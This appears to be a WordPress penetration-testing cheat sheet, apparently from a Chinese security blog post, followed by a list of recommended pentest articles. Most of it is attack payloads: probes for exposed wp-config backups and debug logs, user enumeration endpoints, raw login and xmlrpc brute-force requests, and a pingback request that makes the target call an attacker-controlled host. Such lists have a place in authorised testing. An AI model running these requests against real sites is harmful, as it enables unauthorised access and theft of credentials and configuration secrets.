https://target.com/feed https://target.com/?feed=rss2

https://target.com/wp-content/plugins/PLUGINNAME/readme.txthttps://target.com/wp-content/plugins/PLUGINNAME/readme.TXThttps://target.com/wp-content/plugins/PLUGINNAME/README.txthttps://target.com/wp-content/plugins/PLUGINNAME/README.TXT

https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

http://target.com/wp-content/debug.log

http://target.com/.wp-config.php.swphttp://target.com/wp-config.inchttp://target.com/wp-config.oldhttp://target.com/wp-config.txthttp://target.com/wp-config.htmlhttp://target.com/wp-config.php.bakhttp://target.com/wp-config.php.disthttp://target.com/wp-config.php.inchttp://target.com/wp-config.php.oldhttp://target.com/wp-config.php.savehttp://target.com/wp-config.php.swphttp://target.com/wp-config.php.txthttp://target.com/wp-config.php.ziphttp://target.com/wp-config.php.htmlhttp://target.com/wp-config.php~

http://target.com/?author=1

http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users

POST /wp-login.php HTTP/1.1Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

POST /xmlrpc.php HTTP/1.1Host: target.com
<?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>BRUTEFORCE_IN_HERE</value></param> </params> </methodCall>

POST /xmlrpc.php HTTP/1.1Host: target.com
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourip:port</string></value></param><param><value><string>https://target.com></string></value></param></params></methodCall>

http://example.com/wp-login.php?action=register

推荐阅读：

干货 | Office文档钓鱼之如何快速进行宏免杀

干货 | Github安全搬运工 2022年第十七期

实战 | 记一次渗透拿下某儿童色情网站的经过

干货 | 渗透中403/401页面绕过的思路总结

干货 | 2022最全宏病毒文件制作与防范指南

点赞，转发，在看